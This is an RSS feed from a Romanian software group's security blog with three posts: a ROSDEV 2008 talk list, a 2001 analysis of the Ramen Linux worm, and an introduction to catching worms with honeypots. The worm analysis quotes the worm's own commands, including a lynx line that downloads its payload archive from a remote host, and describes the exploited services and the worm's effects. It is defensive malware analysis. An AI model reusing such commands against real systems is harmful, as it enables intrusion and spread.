<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>TFM Group Software &#187; Security</title>
	<atom:link href="http://www.tfm.ro/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.tfm.ro</link>
	<description>TFM Group Software</description>
	<lastBuildDate>Sat, 27 Aug 2011 21:42:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Conferinta ROSDEV 2008</title>
		<link>http://www.tfm.ro/conferinta-rosdev-2008/</link>
		<comments>http://www.tfm.ro/conferinta-rosdev-2008/#comments</comments>
		<pubDate>Tue, 15 Apr 2008 15:11:03 +0000</pubDate>
		<dc:creator>mihaim</dc:creator>
				<category><![CDATA[Documentation]]></category>
		<category><![CDATA[First page]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[rosdev2008]]></category>

		<guid isPermaLink="false">http://www.tfm.ro/?p=33</guid>
		<description><![CDATA[On 12 April 2008 the second edition of the ROSDEV conference took place. Those who could not make it to the conference and did not follow the live internet broadcast still have the possibility to watch the recordings of the presentations. Ramona Modroiu &#8211; Opening of ROSDEV_2008 Razvan Rughinis &#8211; Open Source in Academia. Part 1 Razvan [...]]]></description>
			<content:encoded><![CDATA[<p>On 12 April 2008 the second edition of the ROSDEV conference took place. Those who could not make it to the conference and did not follow the live internet broadcast still have the possibility to watch the recordings of the presentations.</p>
<p><span id="more-33"></span></p>
<ul>
<li>Ramona Modroiu &#8211; Opening of ROSDEV_2008</li>
<li>Razvan Rughinis &#8211; Open Source in Academia. Part 1</li>
<li>Razvan Rughinis &#8211; Open Source in Academia. Part 2</li>
<li>Mihai Jalobeanu &#8211; Linux and Virtual Learning Environments</li>
<li>Bogdan Radulescu &#8211; The Nimblex Linux Distribution</li>
<li>Liviu Andreicut &#8211; Video monitoring systems / centralized server administration</li>
<li>Zoltan Orban &#8211; AbelCRM</li>
<li>Zsolt Bodi &#8211; Code Igniter</li>
<li>Virgi Adrian Teaca &#8211; DARKSTAR Part 1</li>
<li>Virgi Adrian Teaca &#8211; DARKSTAR Part 2</li>
<li>Daniel Constantin Mierla &#8211; Open Source and VoIP</li>
<li>Cosmin Elefterescu &#8211; Open Source VoIP Platform in the University Campus</li>
<li>Catalin Balan &#8211; OForge</li>
<li>Craciun Attila &#8211; Bluewhite64</li>
<li>Razvan Deaconescu &#8211; ROSEdu</li>
<li>Marian Banica &#8211; Open Source for Higher Education</li>
<li>Iulian Nicu Serbanoiu &#8211; Minimal Voice Generator</li>
<li>Angelescu Ovidiu &#8211; RoFreeSBIE</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.tfm.ro/conferinta-rosdev-2008/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Analiza Ramen Worm</title>
		<link>http://www.tfm.ro/analiza-ramen-worm/</link>
		<comments>http://www.tfm.ro/analiza-ramen-worm/#comments</comments>
		<pubDate>Mon, 03 Mar 2008 22:53:19 +0000</pubDate>
		<dc:creator>mihaim</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[honeypot]]></category>
		<category><![CDATA[ramen]]></category>
		<category><![CDATA[Ramen worm]]></category>
		<category><![CDATA[reverse engineering]]></category>

		<guid isPermaLink="false">http://www.tfm.ro/analiza-ramen-worm/</guid>
		<description><![CDATA[In 2001 I caught, analyzed and dissected the first self-replicating Linux malware, which was named the Ramen Worm. At the time, articles appeared in all the major online publications. This analysis is kept here primarily for historical reasons. Ramen Worm - General Details ============================== 1. Is this really a worm [...]]]></description>
			<content:encoded><![CDATA[<p>In 2001 I caught, analyzed and dissected the first self-replicating Linux malware, which was named the Ramen Worm. At the time, articles appeared in all the major online publications. This analysis is kept here primarily for historical reasons.</p>
<pre>Ramen Worm - General Details
==============================

1. Is this really a worm?
Yes it is.
2. Why?
It has the ability to replicate and it does not infect executable files in order
to do so, so it cannot be considered a virus.
3. Replication technique:
It will scan whole networks (random class B networks XXX.XXX.0.0/255.255.0.0) in order to find vulnerable systems.
Once a vulnerable system is found it will take control of it (the worm will have root access on the compromised machine),
copy itself to the target, and start scanning.

4. Vulnerabilities exploited by the worm
wu-ftpd version 2.6.0
LPRng format string vulnerability
rpc.statd    vulnerability

5. Systems affected
Strings found in the worm indicate that the following systems are targeted:
Redhat 6.0 - (knfsd-1.2.2-4)
Redhat 6.1 - (knfsd-1.4.7-7)
Redhat 6.2 - (nfs-utils-0.1.6-2)
RedHat 7.0 - Guinesss-dev
RedHat 7.0 - Guinesss
but any other Linux running wu-ftpd 2.6.0 or rpc.statd can be affected.

6. Systems that are not affected
Win 9x, Win NT, Win 2000
Non-x86 Unixes.

7. Worm effects
a) Once a system is compromised the worm will find and replace any index.html file with a file carried inside the worm.
b) it will disable anonymous FTP access on the compromised machine (in my opinion this is a "bug" in the worm)
c) it will disable and erase rpc.statd from the compromised machine
d) it will disable and erase the lpd daemon from the compromised machine, so any printing on that machine will be impossible.
e) it will modify inetd.conf on RedHat 6.x and xinetd.conf on RedHat 7.0 and install a fake webserver
on a non-standard port (in my opinion it may also contain a remotely exploitable buffer overflow,
but I couldn't prove that yet). By installing this it allows the spread of the worm.
f) it will remove /etc/hosts.deny
g) it will modify /etc/rc.d/rc.sysinit, allowing the worm to be started each time the machine is rebooted.
h) it will send mail to the following addresses (these 2 mail addresses and a password "bl3h" were encrypted in the worm)
   gb31337@hotmail.com
   gb31337@yahoo.com
i) Once the worm starts scanning it will consume a large amount of your internet bandwidth. The scanning is very fast due to
the use of the synscan technique.
j) Once the system is rebooted it will restart scanning.

8. Spreading
The worm is spreading very fast due to its very fast class B network scanning technique. On our network (10 Mb/sec)
the hub was at its limit and the whole bandwidth was consumed. It scanned 2 class B networks in 15 minutes.

9. Danger
The worm itself seems dangerous due to network bandwidth consumption, and due to the possibility (not proved yet) of
remote access to the compromised box by the worm author.

10. Percentage of boxes vulnerable
There are many vulnerable boxes. It is quite common for Redhat 6.2 or Redhat 7.0 to be installed "standard", making
them vulnerable to this worm. My estimation is that in a class B network the worm will find at least 10-20 vulnerable boxes.

My Original postings to BugTraq:
================================

=================================================================================
=================================================================================

Subject:
  sunrpc / wu-ftpd worm ?
Date:
  Mon, 15 Jan 2001 22:41:50 +0200
From:
  Mihai Moldovanu mihaim AT PROFM dot RO
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS DOT COM
References:
  1

Cristian Dumitrescu wrote:

&gt; Hey
&gt; I've been experiencing the same kind of scans in the last 2 weeks, with
&gt; increased density in the last days, from these ip addresses:
&gt;
&gt; 211.120.63.136
&gt; 213.154.132.122
&gt; 210.205.6.215
&gt; 24.114.48.24
&gt; 62.83.125.82
&gt; 193.231.199.4
&gt; 193.40.223.66
&gt; 65.3.3.83
&gt; 193.230.227.234
&gt; &gt; 24.26.121.156
&gt; &gt; 24.168.66.119
&gt; &gt; 64.31.226.156
&gt; &gt; 142.169.227.102
&gt; &gt; 193.226.15.15
&gt; &gt; 211.218.144.11

Same problems here:
38.232.191.200
24.169.70.243
194.102.254.118
63.146.209.50

But the most interesting is:
130.111.148.69 which seems to be a worm launcher site.
It will connect to the target machine on 111 or 21 and will exploit the well
known rpc.statd and wu-ftp 2.6.0 bug to gain root on the remote machine.

The tar itself is downloaded from that machine on port 27374.

" lynx -source http://%s:27374 &gt; /usr/src/.poop/ramen.tgz "

After a successful install it seems it will send a mail with the command:
" echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com account.

It seems that it has some sort of class B scanner and exploits for rpc.statd and
wu-ftpd

If anyone is interested in taking a deeper look in it mail me and I will send
the .tgz or you can get it from the site I mentioned above.

Best Regards,

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/

http://www.slashdot.ro/

=================================================================================
=================================================================================

Subject:
  Re: anyone else seen an increase in sunrpc scans these days?
Date:
  Mon, 15 Jan 2001 14:40:16 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

Jason Lewis wrote:

&gt; I couldn't find any of those addresses, but I have similar scans in my logs.
&gt;
&gt; 63.91.6.36
&gt; 64.32.209.213
&gt; 64.21.114.2
&gt; 66.22.62.2
&gt; 216.98.160.251

Yes. The same problem here. But not only 111. 21 also.
We deployed a honeypot and waited to be compromised. It took 12 hours to be
compromised. I took it out of the network and this is what I found on it:
It seems like a worm that installs StatDXscan (class B rpc.statd scanner),
wu-ftpd scanner, a modified t0rn rootkit along with Adore LKM rootkit, and
flood tools: Sl2, smurf5, trojaned sshd running on port 48480)
t0rnscan has inside it the following string: irc.webbernet.net:6667

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/

http://www.developers.ro/

=================================================================================
=================================================================================
Subject:
  Ramen worm . More details on it. ( found a password and e-mails crypted inside it)
Date:
  Tue, 16 Jan 2001 22:19:30 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

I completed reverse engineering the ramen worm. There are 3 crypted text
messages in the worm:
2 are email addresses:
Decrypted: "gb31337@hotmail.com" ,  in executable -&gt;  "fa20226?gnsl`hk-bnl"
Decrypted: "gb31337@yahoo.com" ,   in executable -&gt;  "fa20226?x`gnn-bnl"
and a crypted password:
Decrypted "bl3h"  ,   in executable -&gt; "ak2g"
These texts can be found in almost all ELF worm executables.
The crypting algorithm is very easy.

For each character in the crypted text add 1 and you will obtain the plain text.
I used the following C code to decrypt:

/* text holds the crypted string; shifting every byte up by one yields the plain text */
for (i = 0; i &lt; strlen(text); i++) text[i] = text[i] + 1;

The asp executable (the one which gets installed in /sbin/asp and serves
requests on 27374) has a strange getline function coded which
seems to be specially crafted to allow remote upload / execution of code.
Unfortunately I can't prove that the function has a buffer
overflow in it.

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://www.tfm.ro

http://linux.tfm.ro

http://portal.tfm.ro

http://www.slashdot.ro</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.tfm.ro/analiza-ramen-worm/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Analiza generica malware</title>
		<link>http://www.tfm.ro/analiza-generica-malware/</link>
		<comments>http://www.tfm.ro/analiza-generica-malware/#comments</comments>
		<pubDate>Mon, 03 Mar 2008 12:59:40 +0000</pubDate>
		<dc:creator>mihaim</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Analiza malware]]></category>
		<category><![CDATA[debuggers]]></category>
		<category><![CDATA[honeypot]]></category>
		<category><![CDATA[Ramen worm]]></category>
		<category><![CDATA[reverse engineering]]></category>

		<guid isPermaLink="false">http://www.tfm.ro/?p=3</guid>
		<description><![CDATA[How to catch an internet worm using a honeypot First of all, what is an internet worm? A worm is a program that has the ability to replicate itself and to &#8220;move&#8221; from one system to another using security holes in those systems. Studying an internet worm [...]]]></description>
			<content:encoded><![CDATA[<h2> How to catch an internet worm using a honeypot</h2>
<h3> First of all, what is an internet worm?</h3>
<p>A worm is a program that has the ability to replicate itself and to &#8220;move&#8221; from one system to another using security holes in those systems.</p>
<p>Studying an internet worm can be fascinating, but usually, in order to study a worm, you need to have one &#8230; And to get one there are 2 possibilities:</p>
<ul>
<li> You download it from various sites or newsgroups &#8230;</li>
<li> You catch it yourself</li>
</ul>
<p>The second possibility, we have to admit, is much more interesting.</p>
<h3> Tools needed</h3>
<p>A honeypot system and tools for analyzing executables.</p>
<h3> How to build a honeypot for catching worms</h3>
<p>Given that worms are automated programs that usually scan for a fixed set of security holes, the probability of catching a worm on a honeypot is much higher than that of catching a blackhat.</p>
<p>But, given that worms have no &#8220;intelligence&#8221; and as a rule have no honeypot detection mechanisms, the problem can be simplified quite a lot. One can use, for example, vmware + the desired operating system, or UML + the desired Linux. Be very careful, though. A worm that has entered the honeypot will not think twice before it starts attacking other systems. That is why the outgoing traffic control system on the honeypot must be set up VERY carefully. If these scripts are not set up properly, the risk that the worm infects other systems is high, and you do NOT want a worm caught in a honeypot to &#8220;escape&#8221; somewhere else &#8230;</p>
<p>Once all the scripts are written and the honeypot is active, all that remains to do is wait.</p>
<p>Suppose the honeypot is infected with the worm. What do we do next? Now comes the complicated and most interesting part.</p>
<h3> Analyzing the worm</h3>
<p>The dissection part, if you prefer that term.</p>
<p>For dissection (reverse engineering) there are a lot of helper tools. Detailed information about reverse engineering can be found, ironically, on the oldest and best cracking site (www.fravia.org). There you will find a lot of useful information about reverse engineering principles, how-tos, tutorials. The site is largely dedicated to the Windows platform but the principles are similar.</p>
<p>At the time I started writing this &#8220;article&#8221;, IDA was not available for Linux (www.datarescue.com). <em>news &#8230; IDA is now available on Linux too</em>. It is the most widely used tool for disassembling an executable. And it is very useful when you want to understand what happens inside an executable when you do not have its sources. IDA being a Win32 application, wine or vmware will be needed to run it.</p>
<p>When it comes to debuggers, Linux is in good shape. Obviously I have not seen a debugger like SoftIce (for Win32) on Linux. But one can work relatively easily with gdb or xgdb.</p>
<p>The rest of the helper tools for analyzing a worm are usually made on the spot. That is, they are programmed. The basic tools for reverse engineering remain, however: a disassembler, a debugger and lots and lots of patience.</p>
<p>To be continued.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tfm.ro/analiza-generica-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

